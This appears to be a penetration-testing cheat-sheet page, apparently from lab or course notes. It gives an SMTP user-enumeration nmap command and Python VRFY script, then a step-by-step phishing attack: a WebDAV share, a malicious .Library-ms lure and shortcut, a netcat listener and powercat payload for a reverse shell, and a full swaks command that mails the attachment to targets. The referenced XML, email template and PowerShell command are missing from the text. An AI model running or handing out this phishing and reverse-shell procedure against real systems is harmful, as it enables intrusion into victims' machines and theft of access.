SMTP (25)
User enumeration
nmap --script smtp-enum-users.nse -p 25,465,587 <IP>
Automated recon script
python3 smtp_script.py <username> <IP>
Script:
#!/usr/bin/python
import socket
import sys
if len(sys.argv) != 3:
        print("Usage: smtp_user_enum <username> <target_ip>")
        sys.exit(0)
# Create a Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Server
ip = sys.argv[2]
connect = s.connect((ip,25))
# Receive the banner
banner = s.recv(1024)
print(banner)
# VRFY a user
user = (sys.argv[1]).encode()
s.send(b'VRFY ' + user + b'\r\n')
result = s.recv(1024)
print(result)
# Close the socket
s.close()
Phishing attack to get a foothold
Preparation
On Kali Machine:
Create a webshare for target machines to send files to
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
OR
wsgidav -H 0.0.0.0 -p 80 --auth anonymous -r /home/kali/beyond/webdav/
Create a text file named body.txt
Input the following email template into the text file
On Windows Machine:
Create a text file named: config.Library-ms
Input the following xml snippet below into the text file
Create a shortcut that runs the following powershell command that initiates a reverse shell
Transfer both files onto the Kali Machine for hosting
Exploit
On Kali Machine:
Have a netcat listener set up to catch the reverse shell
Have a wsgidav server to host the automatic_configuration.lnk file
Have a python simple server set up to host powercat, or any other payload
Send the email to target mail server and a destination email address:
sudo swaks -t <Target EMAIL> -t <Target EMAIL> --from <Source EMAIL> --attach @config.Library-ms --server <MAILSVR IP> --body @body.txt --header "Subject: Staging Script" --suppress-data
Goal: Target user receive the email, and and executes the .library-ms file. Upon execution, the target machine will fetch the Powercat binary from our Kali machine, and initiate a reverse shell with us. Giving us initial foothold onto the target machine
Last updated